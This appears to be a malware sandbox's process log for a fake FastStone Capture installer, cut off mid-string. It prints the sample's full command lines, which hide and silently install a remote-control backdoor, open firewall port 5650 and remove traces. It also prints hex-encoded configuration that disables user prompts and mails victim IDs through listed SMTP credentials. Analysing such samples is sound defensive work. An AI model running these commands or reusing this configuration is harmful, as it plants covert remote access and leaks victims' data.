| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe
"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit
C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 5650 "Open Port 5650"
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133
C:\Windows\SysWOW64\route.exe
route.exe delete 95.141.193.133
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"
C:\Windows\SysWOW64\drivers\install.exe
"C:\Windows\System32\drivers\install.exe"
C:\Program Files (x86)\FastStone Capture\FSCapture.exe
"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787